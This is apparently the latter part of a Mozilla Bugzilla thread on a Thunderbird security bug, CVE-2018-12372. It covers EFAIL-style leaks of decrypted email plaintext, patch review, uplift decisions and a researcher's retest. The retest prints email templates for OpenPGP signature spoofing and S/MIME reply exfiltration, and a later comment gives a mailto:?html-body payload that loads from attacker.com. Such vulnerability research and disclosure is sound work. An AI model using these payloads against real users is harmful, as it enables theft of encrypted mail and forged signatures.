But if this v5.1 patch really doesn't work, then we can land v4. It misses the margin for the separator, but that's not that serious. We can fix it later properly. We need to get the security fix out.

Jörg or Magnus, it's up to you now. We can land either v5.1 or v4.
Attachment #8979192 - Flags: review?(mkmelin+mozilla)
Attachment #8976363 - Flags: review?(mkmelin+mozilla)
Attachment #8976363 - Flags: review?(mkmelin+mozilla)
Attachment #8976349 - Attachment description: Separate MIME parts from each other, v4 (trunk and 52) - not for landing, but contains code for TB 52 and 60. → Separate MIME parts from each other, v4 (trunk and 52)
Attachment #8976349 - Flags: review?(mkmelin+mozilla)
Ben, no one builds TB 52.x at home. Everyone builds on trunk. I don't understand why you're asking for review again when attachment v4 again, when a later version already had r+ and I addressed the review comments "Content-Type" later.
Ben indicated that he is done here, so I'll collect the pieces and get them landed.
Assignee: ben.bucksch → jorgk
Attachment #8979190 - Attachment is obsolete: true
Attachment #8979192 - Attachment is obsolete: true
Attachment #8979192 - Flags: review?(mkmelin+mozilla)
Attachment #8976349 - Attachment is obsolete: true
Attachment #8976349 - Flags: review?(mkmelin+mozilla)
Attachment #8979123 - Attachment is obsolete: true
Attachment #8979211 - Attachment is obsolete: true
Attachment #8979120 - Attachment is obsolete: false
Attachment #8979120 - Flags: review+
https://hg.mozilla.org/comm-central/rev/96fab4a2b81189101231b12106823748c9a70a94
Parse HTML to make sure that tags and attributes are properly closed. r=mkmelin,jorgk
https://hg.mozilla.org/comm-central/rev/a2472fbf9a2c07e95419cfefa1eb5dd3cd396d88
adjust test expectancy. r=mkmelin,BenB
https://hg.mozilla.org/comm-central/rev/d16fff497d408a3ece7f9eb58874e8151bec70c5
revert temporary fix from bug 1457721. r=mkmelin

A few comments:
Part one is v4 with my clean-up:
I opted for "content-type" because other parts of the system use that string in lower case. That makes the test easier. Also, that will most likely be removed in bug 1463133. It also matches mimethsa.cpp.

I'm not comfortable uplifting this, since the DOM created by the patch isn't right, see bug 1462895, so the body comes after the <div> tag. We should address this in bug 1462895 for "original" and "simple" HTML now. That was basically the difference between v4 and v5.
Status: ASSIGNED → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED
Target Milestone: --- → Thunderbird 62.0
> Ben, no one builds TB 52.x at home. Everyone builds on trunk.

I guess, I'm no one, then :)

My whole goal here was to fix TB 52.

But that's now in the hands of drivers.

Thanks for landing this.
Per Mozilla security bug policy, we unhide security bugs where the details are public anyway. I am going to unhide this bug in 3 days. Because the bug and exploit is very public, literally front page news, and the paper with the bug and attack details has been released about a week ago, and people are very interested in the status.
(In reply to Ben Bucksch (:BenB) from comment #194)
> My whole goal here was to fix TB 52.
Yes, but that's not how we develop.

> But that's now in the hands of drivers.
I'll get it uplifted. I think it's quite risky since we're drastically change the HTML processing. So we might trigger all sorts of bugs/crashes in Gecko's parser or serialiser.
Group: mail-core-security → core-security-release
Jens, can you please make the Daily TB 52 ESR build at
https://archive.mozilla.org/pub/thunderbird/nightly/2018/05/2018-05-22-03-02-01-comm-esr52/
available to your colleagues and Hanno for testing.
Flags: needinfo?(jens.a.mueller)
Attachment #8979120 - Flags: approval-comm-esr60+
Attachment #8979120 - Flags: approval-comm-esr52+
Attachment #8979120 - Flags: approval-comm-beta+
I found some time to re-test TB nightly (2018-05-22) and Enigmail version 2.0.5 (20180521-1522).

As far as I can tell, the related preconnect remote content bypass is fixed (bug 1408867). As well is leaking the plaintext by tricking the user into submitting the it via HTML forms (Bug 1450345, Bug 1462910) or remote images (bug 1457721).

Please note that there may still be bypasses -- in the long term I'd agree with what Ben said (comment 57).


What still works imho is variants of OpenPGP signature spoofing and S/MIME reply-or-forward exfiltration:

* OpenPGP: signature spoofing based on hiding the real signed text with CSS
---------------------------------------------------
Content-Type: text/html

This is arbitrary text inserted by the attacker...
The mail says `good signature' by the entity below
<div style="color: red;">

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

THIS PART IS SIGNED BUT CAN BE HIDDEN WITH CSS
-----BEGIN PGP SIGNATURE-----
...
-----END PGP SIGNATURE-----
```
---------------------------------------------------

* S/MIME: decrypted MIME parts can be completely hidden with CSS; if user replies/forwards in HTML format the (non-visible) plaintext is leaked, otherwise (in text-only reply mode) the victim could be fooled by inserting newlines
---------------------------------------------------
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/html

Reply please to this email
<div style="color: red;">

--BOUNDARY
Content-Type: application/pkcs7-mime; name="smime.p7m"; smime-type=enveloped-data
Content-Transfer-Encoding: base64
...
--BOUNDARY--
---------------------------------------------------


Also I still don't feel comfortable with mailto:?html-body=whatever

Do we actually need this? It allows a website to put untrusted input into composer. This enables an attacker to escalate into HTML context (even if HTML-composing has been disabled by the user); furthermore stuff like <video poster="..."> is loaded automatically here (no user interaction required). If there is no valid requirement for ?html-body it should be removed from TB, imho. (I'm unable to exploit it straight-forward but I have a really bad feeling about this feature).
Status: RESOLVED → REOPENED
Flags: needinfo?(jens.a.mueller)
Resolution: FIXED → ---
I'm afraid at comment >200 we're not going to reopen this(*). Please file a follow-up.

(*) Strictly reopening is only when a patch is backed out which is not the case here.
Status: REOPENED → RESOLVED
Closed: 2 years ago2 years ago
Resolution: --- → FIXED
Jens, comment 201 relates to Enigmail. Inline-PGP is not handled by TBird at all. I'll take this to the Enigmail bug tracker.
(In reply to Jens Müller from comment #199)
> As far as I can tell, the related preconnect remote content bypass is fixed
> (bug 1408867). As well is leaking the plaintext by tricking the user into
> submitting the it via HTML forms (Bug 1450345, Bug 1462910) or remote images
> (bug 1457721).

Good. Thanks for verifying!
I'm setting this on VERIFIED FIXED on behalf of Jens.

> Please note that there may still be bypasses -- in the long term I'd agree
> with what Ben said (comment 57).
...
> * S/MIME: decrypted MIME parts can be completely hidden with CSS; if user
> replies/forwards in HTML format the (non-visible) plaintext is leaked,

That attacks the composer and is an issue separate from the one that was fixed here.

I actually have a solution for that, and a fix. It's the "Sanitize HTML quotes" patch here. It's already described and covered in comment 57 point 2.

For the sake of not prolonging this bug which already has over 200 comments, I would suggest to tackle that separate issue in another bug.
Status: RESOLVED → VERIFIED
Filed bug 1464056 for the reply-or-forward issue
Depends on: 1464391
Some comments based on viewing code in the commits linked to from comment 205:

* Assembling the whole document that's displayed by concatenating strings seems more error prone and less efficient than parsing each MIME part into a document fragment (nsIParserUtils::parseFragment()) using <body> as the context node, sanitizing to remove forms, etc., and then appending the resulting fragments into a skeleton document wrapped in the kind of fieldsets (created using the DOM APIs) that are currently produced by injecting source text.

* While it's unlikely in practice for encrypted parts to contain form controls with a form attribute whole value the attacker could guess, it's worthwhile to be aware of https://html.spec.whatwg.org/#attr-fae-form . Since it's implausible enough for form submissions to be a legitimate use case in the context of emails that contain encrypted parts, I recommend erring on the side of sanitizing more (setting SanitizerDropForms, etc.) in all MIME parts when there is at least one encrypted MIME part. It's not like you need to show a browser-like newsletter rendering experience for encrypted emails.

* In addition to sanitizing form and form control elements, it would probably be a good idea to block form submissions in the message viewer and message editor docshells.
Can we get this released, please?
It's in TB 60 beta 7, released yesterday.
I mean TB 52.8.1. Users are waiting for it since 3 weeks.
While this is a required step, it's essentially useless without bug 1464667, so we need that too.
... and more importantly bug 1464056, right? Suppressing <plaintext> is one thing, but preventing subordinate parts being decrypted is an approach that will also stop attacks where the decrypted part is hidden by CSS.
(In reply to Ben Bucksch (:BenB) from comment #213)
> I mean TB 52.8.1. Users are waiting for it since 3 weeks.
Ben, sadly your changes here exposed ancient old bugs to the regular HTML forward:
Bug 313401 and bug 394322. We got there via bug 1470210.

So this is certainly NOT ready for prime time use since it destroys inline forwarding of messages received from users using MS software.
Alias: CVE-2018-12372
Depends on: 1473893
Duplicate of this bug: 1420217
quick update: I re-tested mailto:?html-body=%3Cvideo%20poster%3D%22http%3A%2F%2Fattacker.com%22%3E"> in TB 60.2.1 and it still allows an attacker to escalate into html context -- if not required this `feature' should be disabled.
Jens, can you please file a new bug about this? You can mention it here for reference. Thanks.

This shipped 8 months ago. Could we please open this bug up?

Duplicate of this bug: 107035

Update: Here's a full (public) report on reply-based decryption oracles and signature oracles (bug #1530106):
https://arxiv.org/ftp/arxiv/papers/1904/1904.07550.pdf

Group: core-security-release
You need to log in before you can comment on or make changes to this bug.